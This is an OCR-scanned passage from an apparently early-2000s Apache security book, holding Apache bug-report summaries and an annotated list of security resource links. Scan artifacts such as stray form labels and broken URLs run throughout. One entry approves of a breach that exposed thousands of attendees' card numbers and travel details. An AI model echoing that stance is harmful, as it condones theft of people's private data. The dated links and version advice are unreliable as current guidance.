Fixed in 1.3.21, this bug produces a buffer overflow. If you’re using an 


earlier version on Win98, upgrade immediately. 


8451 
http://bugs.Apache.org/index.cgi/full/8451 


Linker error: /usr/local/include/sys/sem.h:52: field 'sem_perm' has 


incomplete type 

Apache 

Tue Oct 02 10:50:00 PDT 2001 
Wed Nov 14 23:19:15 PST 2001 
jari.aalto@poboxes.com 
2.0.16 

Win2000 and Cygwin 


The originator tried a build and received massive errors because Cygwin 
wasn’t supported in that release. The official response is to upgrade to 
2.0.28. 


Number: 
URL: 


Synopsis: 


Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 


Arrival Date: 
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8568 
http: //bugs.Apache.org/index.cgi/full/8568 


Web crawlers are able to gain access to directory listings of forbidden 


directories 

Apache 

Wed Oct 17 13:10:00 PDT 2001 
Unspecified 
blackdeath@softhome.net 
1.3.20 

Linux, gcc 


The originator discovered that Web Crawlers can access documents and 
directories on his servers—even in protected directories and those that 
existed for only a day (or even less time). This is distressing. Apache 
hasn’t provided an answer (nor am | sure that they can), but perhaps it’s 
related to the Wayback Machine project 

(http://www. archive.org/index.html). 


8574 

http://bugs.Apache.org/index.cgi/full/8574 

Apache listener hangs/exits with child processes still running 
Apache 

Thu Oct 18 05:40:00 PDT 2001 

sradovan@montage.ca 

1.3.12 

SunOS 5.7, gcc 


The originator received the following error: child pid 11463 exit 
signal Bus Error (10). Apparently, his LockFile config was erro- 


neous; Apache couldn’t make one, and thus bailed out. 


8618 
http://bugs.Apache.org/index.cgi/full/8618 
Failed to get a socket for port 80 

Apache 

Thu Oct 25 10:30:01 PDT 2001 
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Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 


Synopsis: 


Priority: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Unspecified 
jeiderm@yahoo.com.br 
1.3.20-win32-src-r2 
Windows 95 


On startup, the originator received the following error: [crit] 
make_sock: failed to get a socket for port 80. Generally, this 


can be solved by properly defining your ServerName directive. 


8814 
http://bugs.Apache.org/index.cgi/full/8814 


(32538) Socket operation on non-socket: Parent: WSADuplicateSocket 
failed for socket 6640424 


medium 

Apache 

Tue Nov 20 11:20:00 PST 2001 
Unspecified 
some3dlamer@yahoo.com 
2.0.28 beta win32 

Win98SE 

See 8381. 


C 


Apache Security 
Resources 


The following links provide a wide range of tools, advi- 
sories, documents, and other resources that will help you 
secure your Apache host and keep it that way. 


Site Title: Apache Week’s Security Resource 
URL: http://www. apacheweek.com/security/ 


Description: This site documents security vulnerabilities in 


Apache as they emerge. 


Site Title: The WWW Security FAQ 
URL: http: //www.w3.org/Security/Faq/ 


Description: This document is Lincoln Stein’s frequently asked 
questions list on WWW security. First released nearly six years 
ago, this document remains a must-have for all Web adminis- 
trators. The current version is Version 3.1.2, released on 
February 4, 2002. 


Site Title: Apache SSL 
URL: http://www. apache-ssl.org/ 


Description: Apache-SSL is a secure Web server, based on 
Apache and SSLeay/OpenSSL (see OpenSSL at 

http: //www.openssl.org). Apache-SSL is licensed under a 
BSD-style license and you are free to use it for commercial or 
non-commercial purposes, so long as you retain the copyright 
notices. This is the same license as used by Apache from 


version 0.8.15. 
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Site Title: Apache Toolbox 
URL: http://www. apachetoolbox.com/ 


Description: Apache Toolbox provides a means to easily compile Apache with SSL, PHP (v4 
or v3), MySQL, APC (Alternative PHP Cache), mod_auth_nds, mod_dynvhost, WebDAV, 


mod_fastcgi, mod_gzip, mod_layout, mod_throttle, and many, many more. 


Site Title: Apache Guides 
URL: http: //cybernut.com/guides/apache.html 


Description: Cybernut’s comprehensive guide to installing and configuring Apache. Useful if 
you're new to Apache, and the page links out to various tutorials, including those on access 


control. 


Site Title: Apache Week 
URL: http://www. apacheweek.com/ 


Description: A must-visit site for any Apache administrator, Apache Week covers everything, 


including configuring, security, book reviews, recent news, performance tweaking, and so on. 


Site Title: 10th USENIX Security Symposium—Works In Progress Session 
URL: http: //www.usenix.org/events/sec01/mcdaniel_wip.html 


Description: At this event, Sean Smith from Dartmouth presented his paper “Web 
Spoofing,” a discussion of how to circumvent Apache and SSL security. He also presented 
“WebALPS Trusted Third Parties.” Find both papers and more technical discussion on 
SSL/Apache security at http: //www.cs.dartmouth.edu/~pkilab/papers/. 


Site Title: 4.4BSD implementation 
URL: http: //www.v6.imasy.org/nrl.html 


Description: Apache-friendly IPv6 and IP Security implementation for 4.4BSD-Lite from The 
US Naval Research Laboratory (http: //www.itd.nrl.navy.mil/ITD/general.html). 


Site Title: Cara Isengi Apache: Dan Kiat Mengatasinya 


URL: http: //mwmag.sslguarded.com/issue/01/content/hack-7_apache/hack- 
7_apache. html 


Description: An Indonesian Apache security resource site. 
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Site Title: Semanos 70: Security Team 
URL: http: //kerubin.galeon.com/ezines.htm 


Description: Great Spanish language security site, packed with links on various security issues 
(worms, viruses, Apache, PHP, mySQL). 


Site Title: 99-1549: CIAC Bulletin J-042: Web Security 


URL: http: //www-leland.stanford.edu/group/itss-ccs/security/Advisories/99- 
1549.html 


Description: Historical CIAC bulletin with solid advice on how to configure your Web server 
in networks to minimize damage from DoS attacks and avoid other more generic attacks. 


Sadly, CIAC rarely reveals who writes such advisories, so | cannot credit those contributors. 


Site Title: A.P. Lawrence, Consultant-Book Reviews-Internet Security 
URL: http: //www.pcunix.com/Books/is.html 


Description: Site that has book reviews and links to many relevant articles, like John 


Pritchard’s “Setting Up Apache on UnixWare” and A. P. Lawrence’s squidGuard primer. 


Site Title: Access Road home page 
URL: http: //accessroad.sourceforge.net/home. html 


Description: Every once in a while, someone creates a killer application that every Web or 
system administrator should have. Access Road is one such application (but is available only 
for Linux, and perhaps other Unix platforms with the requisite Java support). Access Road 
graphically illustrates permissions on your Web server. If you want to see how deep its analysis 
goes, check out one case study here: 
http://accessroad.sourceforge.net/Documentation/ACdesign_2.html#anchor1117075/. 
Kudos to the author, Patrick Thazard, for a job well done. Finally, someone has started treating 


access control as a model, not a condition. 


Site Title: ACLU in Court: ACLU v. Reno II Expert Report of Dan Farmer 
URL: http: //www.aclu.org/court/acluvrenoII_farmer_rep.html 


Description: Dan Farmer (of SATAN fame) does it again. This is a historical document. 
However, if you’re new to Web security, it’s a gem. In sum, the ACLU went heads-up with 
Janet Reno and the Department of Justice on content filtering and online pornography. Here, 
Dan responds in his capacity as an expert witness, explaining Web security and his findings in 
“Shall We Dust Moscow,” a project in which he scanned thousands of purportedly secure Web 
sites. Find SWDM here: http: //www.trouble.org/survey/. 
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Site Title: Adminhelp.org 
URL: http: //www.adminhelp.org/ 


Description: Site that contains useful tools and utilities for Apache administrators, including 
215 prefabricated CGI scripts that do things such as counting, checking permissions, log 


analysis, and so on. 


Site Title: Administrators Windows NT links 
URL: http: //www.it.jyu.fi/%7Ejej/nt-links.html 


Description: Excellent list compiled by Jukka Jarvinen of important security resources for NT 


system, Web, and Apache administrators. 


Site Title: Advisories: PHP and Apache Vulnerability 
URL: http: //www.secureroot.com/security/advisories/9761548341 .html 


Description: Advisory that shows how crackers can exploit W2K or WinNT 4.0 + Apache 
1.3.6 + PHP to gain read access to files. Credit goes to CHINANSL at 


http: //www.chinansl.com. 


Site Title: Advisories: PHP Apache Module Bug 
URL: http: //www.secureroot.com/security/advisories/9795692378.htm1l 


Description: Advisory that shows how crackers can—in very limited conditions—exploit 
Apache + PHP to bypass .htaccess security. Credit here is to the PHP Group at 
http: //www.php.net. 


Site Title: Advisories: Possible Security Issues with Apache 
URL: http: //www.secureroot.com/security/advisories/9641781410.html 


Description: Historical advisory about Apache 1.2.5 through the 1.3b4 beta. The advisory 
stemmed from coding errors in cfg_getline(), mod_include, logresolve, mod_proxy, and 
the proxy cache. (Additionally, there were issues with .htaccess bypassing.) The document is 
relevant here because if you’re a C programmer, you can go back to 1.2.x, look at the prob- 


lems, and understand why the issues arose. 


Site Title: Advisories: SuSE Apache CGI Source Code Viewing 
URL: http: //www.secureroot.com/security/advisories/9684965790.htm1 


Description: Historical advisory that explains how attackers can gain access to files that 


contain user IDs and passwords. SuSE 6.4 and earlier reportedly harbored this problem. Credit 
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here goes to the team at @stake at http: //www.atstake.com. The document is relevant here 
because if you’re a C programmer, you can go back, look at the problems, and understand 


why the issues arose. 


Site Title: Advisories: SuSE Apache WebDAV Directory Listings 
URL: http: //www.secureroot.com/security/advisories/9684966437.htm1 


Description: Historical advisory that explains how attackers, by exploiting the WebDAV 
extension (see RFC 2518), can gain access to secret or protected files. Credit here goes to the 
team at @stake at http: //www.atstake.com. The document is relevant here because if you're 
a C programmer, you can go back, look at the problems, and understand why the issues 


arose. 


Site Title: Advisories: SUSE Security Announcement: pam_smb 
URL: http: //www.secureroot.com/security/advisories/9693904117.htm1l 


Description: Historical advisory that explains how attackers, by exploiting pam_smb, a 
Pluggable Authentication Modules module that allows Unix-style authentication from WinNT 
to Unix, can gain accelerated and unauthorized access. Credit here goes to SuSE at 


http://www. suse.com. 


Site Title: Advisories: Updated apache, php, mod_perl, and auth_ldap Packages Available 
URL: http: //www.secureroot.com/security/advisories/9735735897. html 


Description: Historical advisory that reports updates for mod_rewrite, which had security 
issues. Credit here goes to Red Hat Software at http: //www.redhat.com. The document is 
relevant here because if you’re a C programmer, you can go back, look at the problems, and 


understand why the issues arose. 


Site Title: AERAsec—Network Security—News March 2000 
URL: http://www. aerasec.de/security/0300_e.html 


Description: Historical advisory on Apache. The advisory isn’t important, but the site is. The 
root of the site is http: //www.aerasec.de/security/, but it’s in German. Advisories and 
summaries in English, however, are available. URLs are numbered, and ones in English follow 
the number by an underscore and an “e”, as in 

http://www. aerasec.de/security/0300_e.html. This site is comprehensive, covering secu- 


rity advisories from widely diverse sources. 
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Site Title: alldas.de Security Help Archive 
URL: http: //security.alldas.de/ 


Description: Security archive with useful links, including mirrors of recently hacked sites. 
(Don’t ever let your site get on that list.) Most interesting is the archive that scores well- 
known attackers by how many Web sites they defaced (it also stores the sites themselves). 
Maybe our vendors and cyber defense people should visit this site. In the A category, which 
cites 150 attackers alone, Azrae1666 reigns supreme with 199 defaced sites, and of these, 


most were in the US. Busy fellow. 


Site Title: AmEx, Discover Forced to Replace Cards over Security Breach 
URL: http: //news.cnet.com/news/Q-1007 -200- 1526496. html 


Description: Historical article by CNET staff writer Troy Wolverton about how an attacker 
ripped more than 350,000 American Express and Discover credit card numbers. But, the 
Internet is unequivocally safe for credit card transactions, isn’t it? The article’s not relevant to 
Apache, but merely a lesson learned: The Net is not safe for credit card transactions, no 


matter what your vendor, bank, or credit card company contends. 


Site Title: An Extensively Instrumented Apache/Linux 
URL: http: //www.isoc.org/inet99/posters/058/index.htm 


Description: Discussion of NIST’s ALMT (Apache/Linux Measurement Toolkit), which does 
performance measuring. If you have high traffic and use Linux and Apache, this will interest 
you. Even if you have no interest in the specific solution proposed, the mere discussion is 
instructive on how Apache handles traffic. Credit here goes to Debra Tang and Jihg-Hong Lin 
of NIST. 


Site Title: ANNOUNCE Apache::ASP v1.95—Security Hole Fixed 
URL: http: //members.cotse.com/mailing-lists/bugtraq/2000/Jul/0141.html 


Description: Historical advisory about how Apache: :ASP had a serious hole. If you're a Perl 
programmer, this is relevant because you can go back, check the flawed module against the 


fix, and understand why the issue arose. Credit here goes to Joshua Chamas. 


Site Title: ANNOUNCE: New Security Tool: HostSentry 0.02 Alpha 
URL: http: //www.cert.uni-stuttgart.de/archive/bugtraq/1999/03/msg00190.htm1 


Description: An announcement from Psionic software on HostSentry, an excellent IDS tool 
for Unix-based systems. The announcement describes its basic characteristics, but you can get 


the tool at http: //www.psionic.com/abacus/hostsentry. 
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Site Title: Apache 1.3.14/Tomcat 3.2.1/Ilrix 6.5 
URL: http: //www.ccl.net/cca/software/UNIX/apache/irix-6.5/README. html 


Description: Jan Labanowski here describes experiences with integrating SGI, Java, Tomcat, 
and Apache, and IRIX. This is essentially a quick primer on getting these technologies running 


on an SGI. 


Site Title: Apache Configuration Editor 
URL: http: //www.darkphoton.com/darkstar/ 


Description: Here you'll find Dark Star Technologies’ Apache Configuration Editor, a tool that 


enables you to manage Apache's configuration on Windows (Win95, NT 4.0, 2000). 


Site Title: Apache Debugging Guide 
URL: http: //apache.kks.net/debugging. html 


Description: Tools and techniques for debugging Apache and Apache modules. A good 


starting place if you want to start writing modules but haven’t yet had experience in this area. 


Site Title: Apache’s Java Apache Project 
URL: http: //java.apache.org/ 


Description: This site is your starting point for Apache in Java. Here you'll find powerful 
servlets, applets, examples, source code, and documentation sufficient to guide you through 


Java/Apache development. 


Site Title: Apache Quick Reference Card 
URL: http: //www.refcards.com/about/apache.html 


Description: Great quick reference from Apache: The Definitive Guide. 


Site Title: Measurement, Analysis and Performance Improvement of the Apache Web Server 
URL: http: //www.ele.uri.edu/Research/hpcl/Apache/ 


Description: A paper by Yiming Hu, Ashwini Nanda, and Qing Yang, presented in the 18th 


IEEE International Performance. Studies Apache’s performance. In PostScript. 


Site Title: Design Considerations for the Apache Server API 
URL: http: //www5conf.inria.fr/fich_html/papers/P20/Overview.html 


Description: This HTML paper by Robert Thau explains design decisions, what problems the 


API tries to solve, and how it is structured to solve those problems. 
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Site Title: Apache Server Survival Guide 
URL: http://www. hQwt®.com/fileoftheday/Apache/ index.htm 


Description: Manuel Alberto Ricart’s Apache Server Survival Guide from SAMS.NET. 


Good, general advice. 


Site Title: Apache Tomcat/Apache UNIX FAQ 
URL: http: //kekule.osc.edu/cca/software/UNIX/apache/tomcatfaq.shtml 


Description: Tomcat is a tool to use Java Server Pages (JSP) with Apache in conjunction with 
JServ. This HTML document explains some of the finer points of doing that. Credit goes to 


Jan Labanowski of the Ohio Supercomputer Center. 


Site Title: Apache.org Compromise Report, May 30th, 2001 
URL: http://www. apache. org/info/20010519-hack. html 


Description: Apache’s own site was hacked on May 17, 2001, and this is Apache’s official 


report on the incident in HTML. Credit goes to The Apache Software Foundation. 


Site Title: Apache-DBD::Informix Howto 
URL: http: //www.iiug.org/resources/linux/Howto_DBD.html 


Description: Apache plus Informix? You bet. This HTML document, authored by Marco 


Greco with contributions from Jonathan Leffler, gives the short and skinny on how to do it. 


Site Title: Apache-SOAP User’s FAQ 
URL: http: //xml.apache.org/soap/faq/faq_chawke.html 


Description: This HTML document by Jonathan Chawke (who maintains the FAQ and the 
Apache-SOAP User’s Mailing List) discusses Apache and the Simple Object Access Protocol. 


Site Title: Appendix C2—Installation of the Hawkeye PHP Admin Tools 
URL: http: //hawkeye.net/doc/appendix_c2.htm 


Description: Part of the Hawkeye Documentation Index, Version 1.20, this HTML document 
authored by Thomas Haberland and Roland Haenel explains how to install Hawkeye’s server 
suite with Apache + PHP. (Hawkeye is an Internet/intranet server suite, implementing Web, 


mail, news, file and chat servers.) 


Site Title: AS/400 or i-Series 
URL: http: //www.huikb.com/as_400 or_i-series.html 


Description: AS/400 servers with Apache 2.0. Commercial site. 
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Site Title: ATTRITION Tools 
URL: http: //www.attrition.org/tools/ 


Description: A few good security tools from the folks at attrition.org. 


Site Title: Authentication Module for Apache 
URL: http://www. frogdot.org/mod_auth_mda/index.html 


Description: Home base of mod_auth_mda with discussion of how the module works. It stores 


graphical representations of the module’s procedures. 


Site Title: AWKhttpd—HTTPD written in AWK 
URL: http: //awk.geht.net:81/README. html 


Description: Are you an awk advocate? Here it is, then, for your surfing pleasure: an httpd 
implementation by Valentin Hilbig entirely in awk (called, of course, AWKhttpd). This isn’t rele- 
vant to Apache security, but is instead an interesting study in developing servers with alternate 
languages. It’s extensible with modules as well, but supports no virtual hosts. (How can it be?) 
Interesting note: It’s not anywhere near as slow as its author suggests. More interesting note, 
especially for late-night programmer amusement: The site links to httpd servers written in sed 
(incredible), shell language (come on!), and PostScript (yes, PostScript). Now, that’s a hack if | 


ever saw one. 


Site Title: Basic Apache Security Considerations 
URL: http: //www.sans.org/infosecFAQ/Web/apache_sec.htm 


Description: Article from SANS and John E. Grotevant on basic Apache security. An in-a- 


nutshell look at Apache security. 


Site Title: Basic Merit AAA Server 
URL: http: //www.merit.edu/aaa/ 


Description: The Merit Authentication Server is a full-fledged RADIUS implementation for 
Linux/Unix systems. (Planning on starting a small ISP?) Mind the licensing here: it’s freely 


available, but not for redistribution. 


Site Title: BigNoseBird’s APACHE Server Reference and Tutorials 
URL: http: //www.bignosebird.com/apache. shtml 


Description: A few quick but good tutorials here. Example: “Preventing bandwidth theft 


using mod_rewrite and .htaccess.” Credit: BigNoseBird. 
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Site Title: Black Oasis—Updated Security Tools 
URL: http: //home.earthlink.net/~humbz/ust05.htm 


Description: A few interesting security tools here, such as NTsyslog 1.5, which runs as a 
service under Windows NT, formats all system, security, and application events to a single line, 


and sends them to a syslog(3) host. Credit goes to Black Oasis. 


Site Title: Build a Secure System with LIDS 
URL: http://www. linuxfw.org/feature_stories/feature_story-12.html 


Description: Discussion of building secure servers around Linux Intrusion Detection System 
(LIDS). This system provides you not merely with intrusion detection, but incisive access 
control as well, even to the point of disallowing root access to certain system resources. Credit 


goes to Xie Huagang. 


Site Title: Building a Secure RedHat Apache Server HOWTO 
URL: http://www. linuxdoc.org/HOWTO/SSL-RedHat -HOWTO.htm1 


Description: Richard Sigle’s HOWTO that explains how PKI and SSL work together. 


Site Title: Building Intrusion Tolerant Applications 
URL: http: //crypto.stanford.edu/~dabo/abstracts/ittc.html 


Description: Paper that discusses means of handling intrusions through a new concept. “The 
ITTC project provides tools and an infrastructure for building intrusion tolerant applications. 
Rather than prevent intrusions or detect them after the fact, the ITTC system ensures that the 
compromise of a few system components does not compromise total system security.” Credit 
goes to T. Wu, M. Malkin, and D. Boneh. 


Site Title: Class JarSigner 


URL: http: //www.bitwaste.com/projects/JARSigner/doc/com/bitwaste/jarsigner/ 
JarSigner. html 


Description: Java class for signing JAR files. 


Site Title: Common Gateway Interface & Web Security 
URL: http: //www.dia.unisa.it/~ads/corso-security/www/CORSO- 
9900/cgiSecurity/cgiSecurity.html 


Description: Thorough tutorial in Italian on CGI security by M. Cillo, G. Di Santo, and L. 
Venuti. 
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Site Title: DAML Tools 
URL: http: //www.daml.org/tools/ 


Description: The DARPA Agent Markup Language Homepage, with DAML security tools and 
explanations. The Semantic Web is coming, and if you intend to implement it, this is an inter- 
esting read. Credit: DARPA Technology Integration Center (TIC) in Arlington, VA. 


Site Title: Das SSL-Apache Handbuch 
URL: http://www. informatik.hu-berlin.de/~bell/Doku/Apache-ssl 


Description: Handbook on using SSL + Apache in German. Credit goes to DFN-PCA in 
Hamburg. 


Site Title: DECS—Security 
URL: http: //www.egr.msu.edu/decs/support/security/ 


Description: Division of Engineering Computing Services security page at the Michigan State 
University College of Engineering. Good general security site, with updates on the latest advi- 


sories. 


Site Title: Detecting Intruders—MPRM Group Limited 
Network Security 
URL: http: //www.mobrien.com/intruders.shtml 


Description: Well-researched article on manually detecting intrusions. Nothing incredibly in- 


depth, but great to have all this information assembled in one place. Credit: MPRM Group. 


Site Title: Dot-Com Builder: Security 
URL: http: //dcb.sun.com/practices/websecurity/ 


Description: Good all-purpose security site at Sun that includes current articles on issues that 
will interest any Apache administrator. Examples: Brian Stephens’ “Architecting Secure 
Network Topologies,” which studies deficiencies in VLANs, and Lori Houston’s “SOAP Security 
Issues,” an excellent overview of Simple Object Access Protocol's security implications (and 


such wildcard technologies as ebXML Messaging Service). Credit goes to Sun Microsystems. 


Site Title: DSL and Cable Modem Security 
URL: http: //www.pcunix.com/Security/dslsecure.html 


Description: Hosting Apache from home? This article from A. P. Lawrence is instructive and 


features links to many important documents. 
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Site Title: Dutch Security Information Network 
URL: http: //www.dsinet.org/ 


Description: The Dutch Security Information Network’s home. Great all-purpose notification 
network in English and Dutch with up-to-date advisories and articles. Examples: “Hacking the 
TCSX-1 for Fun and Profit,” “IPsec Tunneling Between FreeBSD Hosts,” “New Vulnerability in 


OpenSSH,” and so on. Credit: Dutch Security Information Network. 


Site Title: E-mail—Security and Headers, Tracing, Spamming, Etc. 
URL: http: //members.tripod.co.uk/netmiser/spamhelp.htm 


Description: An all-purpose starting point for e-mail security issues, including forgeries, 


tracing spam, and so on. Credit: Debra Wilson. 


Site Title: FAQ: Network Intrusion Detection Systems 
URL: http://www. robertgraham.com/pubs/network -intrusion-detection. html 


Description: The IDS FAQ. If you'd like to implement an intrusion detection system but have 


no experience in this area, this document is a great help. Credit: Robert Graham. 


Site Title: FrontPage Server Extensions: Security Considerations 
URL: http: //ww.rtr.com/fpsupport/SERK/security.htm 


Description: Excellent document that illustrates the issues behind FrontPage extensions. 
Credit: Microsoft. 


Site Title: GNUJSP 
URL: http: //www.klomp.org/gnujsp/ 


Description: GNUJSP is a free implementation of Sun’s Java Server Pages. Credit goes to 
Vincent Partington. If you’re using Mac OS X, a good related article is “Installing GNUJSP on 
MacOS X Server,” written by Chris Stetson and located at 

http: //metadogs.com/tech/mosxs_jsphelp.jsp. 


Site Title: GuardCentral.com 
URL: http: //www.guardcentral.com/ 


Description: Intelligent security news site that includes articles from various publications 


around the Internet. 
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Site Title: Guide for Building a PPPoE Gateway and Firewall Using OpenBSD 

URL: http: //real.ath.cx/BSDinstall. html 

Description: In-depth article by Real Ouellet that provides an excellent solution to PPPoE 
(PPP over Ethernet) overhead. If you’re using XDSL to host an Apache system and your 
provider uses PPPoE, this is for you. You can deal with the PPPoE issue and establish an excel- 


lent firewall in the bargain. 


Site Title: Hacking & Cracking Pages 

URL: http: //www.crackinguniversity2000.it/hacking.html 

Description: An Italian hacking site with many tools, tutorials, and books. This site is reminis- 
cent of the hacking days of old, and contains copious resources on everything from forensic 
analysis to hacking MAPI, SAPI, and TAPI. Sample paper: Ron Gula’s “Broadening the Scope of 
Penetration Testing Techniques: The Top 14 Things Your Ethical Hackers for Hire Didn't Test.” 
Sample tool: packet2sq1, which converts any text file/log file that contains ipchains packet 
logs into a stream of SQL inserts that can be used as the base for a firewall-analyzing database 


application. 


Site Title: Hacking Lexicon 
URL: http://www. robertgraham.com/pubs/hacking-dict.html 


Description: Robert Graham’s Hacking Lexicon. 


Site Title: HTTPD: :Realm—Database of HTTPD Security Realms 

URL: http: //moose.qx.net/perldocs/HTTPD/Realm. html 

Description: HTTPD: :Realm defines high-level security realms to be used in conjunction with 
Apache, Netscape, and NCSA Web servers. This allows automated tools to change user pass- 


words, groups and other information without regard to the underlying database implementa- 
tion. Credit: Lincoln Stein (of WWW Security FAQ fame). 


Site Title: HTTPD: :RealmManager—Manage HTTPD Server Security Realms 

URL: http: //moose.qx.net/perldocs/HTTPD/RealmManager.html 

Description: HTTPD: :RealmManager provides a high-level, unified view into the many access 
control databases used by Apache, Netscape, NCSA httpd, CERN, and other Web servers. It 
works hand-in-hand with HTTPD: :Realm, which provides access to a standard configuration 
file for describing security database setups. Credit: Lincoln Stein (of WWW Security FAQ fame). 
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Site Title: Information Security Magazine 
URL: http://www. infosecuritymag.com 


Description: TruSecure’s glossy, well organized, informative Information Security Magazine. It 
has a strong commercial bent, but carries excellent articles by security professionals well- 


recognized in the field. 


Site Title: Integrate Security Infrastructures with JBossSX 
URL: http://www. javaworld.com/javaworld/ jw-08 -2001 / jw-0831-jaas. html 


Description: Declarative security overview of Java 2 Enterprise Edition, the Java 
Authentication and Authorization Service (JAAS), and how you can manage security of the 
same with JBossSX. If you dabble in XML, are using J2EE, and intend to secure Java-driven 


applications, this is an engrossing read. Credit: Scott Stark. 


Site Title: Integrating LDAP with Perl and Apache 
URL: http: //www.posey.org/1998 perl_conference/Perl_and_Apache/LDAP/ index.html 


Description: Clayton Donley’s paper on Apache/LDAP integration and how it bears on secu- 


rity, user authentication, and access control. (Also, good discussion on Net: : LDAPapi.) 


Site Title: Internal Security: Rules and Risks 
URL: http: //www.webtechniques.com/archives/2001/07/sholtz 


Description: Article whose author (PrivacyRight’s Paul Sholtz) reports that the Black Bloc 
ripped the “New World Order” master list from the World Economic Forum. “On February 4, 
2001, anti-globalization activists mailed a CD-ROM to a Swiss newspaper that listed the 
names of 27,000 attendees of the 2001 World Economic Forum in Davos, Switzerland.” 
Activists listed personal details (credit card numbers, addresses, travel itineraries) of 1,400 
targets, including Bill Gates, Tim Koogle, Madeleine Albright, and Shimon Peres. Data on an 
additional 1,800 targets listed Web passwords, payment methods, and session information. 
I'd be hard-pressed to cite a more prestigious hack, or one that struck more deeply at the 
heart of today’s “Imperialist” interests. Certainly, the WEF should maintain higher levels of 
security than this. By not doing so, it inadvertently exposed Earth’s emerging aristocracy for 
the world’s amusement. This event illustrated an important lesson: The Web levels the playing 
field and exposes everyone—no matter how privileged or insulated they are—to intelligence 
gathering and risk. Most of the 3,200 victims, meanwhile, probably have no idea that their 


data is out there floating around. 
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Site Title: Internet Firewalls Frequently Asked Questions 
URL: http://www. hideaway.net/texts/fwfaq. html 


Description: Marcus Ranum’s dated but fundamentally solid and informative firewalls FAQ. If 
you're new to network security and/or firewalls, this is a must-read standard. Mr. Ranum, 
formerly of TIS, V-One, and NFR, is an Internet security aficionado from days of old. He report- 


edly co-designed the firewall first deployed at www.whitehouse.gov. 


Site Title: Internet Security Resources and Links 
URL: http://www. rtek2000.com/Tech/InternetSecureLinks. html 


Description: Site with many links to technologies of vital interest to Webmasters and Apache 
administrators, including tools and/or documents that facilitate or explain authentication, 


network access control, Web site performance and load balancing, log file analysis, and so on. 


Site Title: IT Security Cookbook 
URL: http: //www.boran.com/security/index.html 


Description: Sean Boran’s online book—updated annually—that describes bottom-line secu- 


rity measures for a multitude of contingencies, especially in heterogeneous networks. 


Site Title: Mac OS X 10.0 Security Essentials 
URL: http: //www.sans.org/infosecFAQ/mac/OSX_sec.htm 


Description: Informative article by Roland E. Miller IIl that examines Mac OS X security. In it, 
Miller discusses Apache, developer tools within the BSD-based system that could aid local 
attackers, and file system and partition security. This is an important document for users new 
to OS X, Apache, and Unix-based systems generally. Miller also covers OpenSSH, ipfw, and 
tcp wrappers, all of which, although old hat to Unix and Linux administrators, remain rela- 


tively new developments to Mac. 


Site Title: Macintosh Security Site 
URL: http: //www/securemac.com/ 


Description: This site, run by Freaky, is bar none the Internet’s best Mac security site. 
Because OS X ships with Apache—and many other tools new to Mac users—this site is essen- 
tial. If you intend to administrate an Apache server on Mac OS X or OS X Server, bookmark 
SecureMac and visit it often. Many in the Mac community have expressed anxiety over adopt- 
ing the new system, mainly because of their unfamiliarity with OS X’s underlying technologies. 
Well, | suspect that however indirectly, Freaky’s site will reassure Mac users and encourage 


them to migrate over. It’s really an excellent site. 
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Site Title: MaclnTouch Reader Reports: OS Web Security Issues 
URL: http: //www.macintouch.com/Websecurity.html 


Description: This page is engrossing, but not what you'd traditionally expect as a security 
resource. Steve Dawson wrote a letter, “MacOS Versus Mac OS X Security as a Webserver,” in 
which he argued that earlier MacOS versions surpassed Mac OS X in security. He then 
awaited responses—and received them. In follow-up letters, Mac users deploying both 
versions give long and informative responses on the debate and relate their personal experi- 
ences. If you just recently migrated to Mac OS X and intend to deploy Apache on it, this 


heated exchange is worth reading. 


Site Title: mod_perl Coding Guidelines 
URL: http: //perl.apache.org/guide/porting.html 


Description: Stas Bekman’s excellent primer on coding modules for Apache. Great stuff for 
the budding module hacker. 


Site Title: Novell Developer Kit—Apache Modules for NetWare Details 
URL: http: //yes.novell.com/ndk/modapach.htm 


Description: If you're contemplating running Apache on Novell NetWare, this site has 
several useful modules and articles that can get you up and running. Sample article: “How to 
Use NDS eDirectory to Secure Apache Web Server for NetWare.” Credit: Novell. 


Site Title: Protecting the Apache HTTP Server: General Security & Protection From HTTP DoS 
URL: http: //www.sans.org/infosecFAQ/sysadmin/apache.htm 


Description: Kevin J. Martin examines various attacks that Apache has historically fallen 


victim to, and how to prevent them or minimize their effects. 


Site Title: SecMod—Security Module for Unix Operating Systems 
URL: http: //www.secmod.com/ 


Description: SecMod is an extension module for Unix operating systems that gives an 
administrator total control over what applications and users can do on the system. It offers 
enhanced file, directory, network, and process quota security. A commercial product worth 
investigating. Credit: Oy Online Solutions. 


Site Title: Setting Up Apache Tomcat and SOAP for SSL Communication 


URL: http: //xml.apache.org/soap/docs/install/FAQ_Tomcat_SOAP_SSL.html 


Apache Security Resources 571 


Description: Article by Peter Glynn and Darrell Drake that addresses a fairly complicated 
application set in a security context. The document is no-nonsense and provides a clear path 
to getting these technologies up and working together, including Java Secure Socket 
Extensions (JSSE) installation, key generation, and preparing both Tomcat and SOAP to inter- 
face with SSL. 


Site Title: SSL Performance: Stronghold/Apache+SSL on Linux, FreeBSD, and BSDI platforms 
URL: http: //askon.cz/csw-labs/Stronghold%20report/shperformance. html 


Description: A fairly deep analysis of Stronghold and Apache + SSL (security httpd imple- 
mentations) performance. As you'll invariably find if your server takes heavy traffic, SSL does 
have overhead; enough overhead, actually, that many vendors make PCI cards that exclusively 
handle SSL, thus relieving the server of that responsibility. At any rate, this document, by 
Shawn Abbott and Stephen Keung, looks at performance on several platforms and hardware 


configurations. 


Site Title: Using Apache as a Secure Web Server 
URL: http: //linux-rep.fnal.gov/RHL-7.1-Reference-HTML/ch-installation. html 


Description: From Red Hat Software (Red Hat Linux 7.1: The Official Red Hat Linux 
Reference Guide), this document discusses mod_ss1, OpenSSL, Apache, and TLS (Transport 
Layer Security). 


Site Title: Using Apache JServ 
URL: http: //www.magiccookie.com/computers/apache-jserv/old-howto.html 


Description: This page describes how to download, build, install, and configure the beta 
version of Apache JServ. Apache JServ is a module for the Apache Web server that implements 


Sun’s Java Servlet API for running server-side Java code. 


Site Title: Version Augmented URIs for Reference Permanence via an Apache Module Design 
URL: http: //class.ee.iastate.edu/berleant/home/me/cv/papers/195.htm1 


Description: Interesting article that doesn’t focus on security, but rather a method of using 


an Apache module to improve the reliability of document delivery on Web servers. 


